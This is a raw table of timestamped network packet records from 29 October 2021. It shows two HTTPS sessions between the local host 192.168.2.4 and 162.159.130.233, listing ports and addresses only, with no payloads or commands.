Oct 29, 2021 20:50:00.068378925 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068525076 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068552017 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068583012 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068591118 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068620920 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068804026 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068829060 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068866014 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.068876982 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.068941116 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069134951 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069164038 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069200039 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069209099 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069242954 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069479942 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069508076 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069556952 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069567919 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069591045 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069768906 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069797993 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069843054 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.069855928 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.069871902 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.070214033 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070241928 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070298910 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.070316076 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070329905 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.070516109 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070544004 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070602894 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.070612907 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.070650101 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.071717978 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071753025 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071789980 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.071803093 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071827888 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.071852922 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071877956 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071907043 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.071913958 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071933985 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.071953058 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.071979046 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.072006941 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.072014093 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.072056055 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.076445103 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.081311941 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.081388950 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.081465006 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.081495047 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.081512928 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.081538916 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.081581116 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087255001 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087346077 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087424040 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087483883 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087534904 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087564945 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087598085 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087605953 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087621927 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087646008 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087762117 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087800026 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087843895 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087852001 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087867022 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087886095 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087899923 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087948084 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.087969065 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.087975979 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.088007927 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.088027954 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.088979959 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089031935 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089055061 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089090109 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089107990 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089148998 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089402914 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089442015 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089518070 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089521885 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089556932 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089585066 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089601994 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089739084 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089796066 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089814901 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089827061 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.089859009 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.089878082 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090019941 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090055943 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090117931 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090123892 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090161085 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090164900 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090179920 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090195894 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090199947 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090244055 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090251923 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090272903 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090276957 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090307951 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090318918 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090384960 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090390921 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090416908 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090429068 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090567112 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090599060 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090667963 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090672970 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.090692997 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090708971 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.090755939 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.094671965 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094702959 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094758034 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.094773054 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094795942 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.094820976 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.094835043 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094851017 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094886065 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094888926 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.094897985 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.094938993 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095155001 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095196009 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095215082 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095221043 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095247984 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095264912 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095374107 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095412016 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095431089 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095437050 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095463991 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095484972 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095644951 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095685005 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095704079 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095710039 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.095762968 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095782042 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.095976114 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096038103 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096093893 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096158028 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096273899 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096335888 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096338034 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096359968 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096441984 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096442938 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096462965 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096518040 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096580029 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096591949 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096601009 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096667051 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096892118 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096931934 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.096980095 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.096992016 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097028017 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097064972 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097182989 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097212076 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097255945 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097265005 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097279072 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097312927 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097315073 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097346067 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097353935 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097382069 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.097398996 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.097445011 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.098411083 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.116632938 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.131432056 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.131483078 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.131583929 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.132045984 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.132096052 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.169888973 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.181711912 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.181768894 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231208086 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231349945 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231400013 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231411934 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231429100 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231473923 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231517076 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231666088 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231705904 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231710911 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231731892 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231767893 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231779099 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231816053 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231849909 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231851101 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231868029 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231899023 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231909990 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231942892 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.231980085 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.231992960 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232028961 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232053995 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232067108 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232084990 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232120037 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232121944 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232136965 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232182980 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232198954 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232249022 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232283115 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232311010 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232321024 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232331991 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232359886 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232392073 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232428074 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232429981 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232439995 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232492924 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232500076 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232511997 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232549906 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232568979 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232605934 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232641935 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232649088 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232661963 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232697010 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232707024 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232747078 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232779980 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232786894 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232800961 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232839108 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232841969 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232877016 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232917070 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.232928038 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.232999086 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.233047009 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.233062029 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.248616934 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.248703957 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.248724937 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.248769999 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.248778105 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249142885 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249224901 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249224901 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249239922 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249291897 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249305010 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249372959 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249375105 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249383926 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249418020 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249461889 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249473095 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249481916 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249501944 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249502897 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249532938 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249541044 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249557018 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249560118 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249583960 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.249591112 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.249639034 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265630960 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265691042 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265721083 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265732050 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265741110 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265743971 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265784025 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265806913 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265822887 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265836000 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265844107 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265887976 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265897989 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265913010 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265942097 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.265952110 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.265963078 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.266701937 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266765118 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.266776085 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266814947 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266819000 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.266834021 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266859055 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.266902924 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266957998 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.266968966 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.266983032 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267026901 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267028093 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267039061 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267074108 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267074108 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267082930 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267121077 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267122030 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267132998 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267168999 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267180920 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267221928 CEST	443	49804	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:00.267235041 CEST	49804	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:00.267245054 CEST	443	49804	162.159.130.233	192.168.2.4
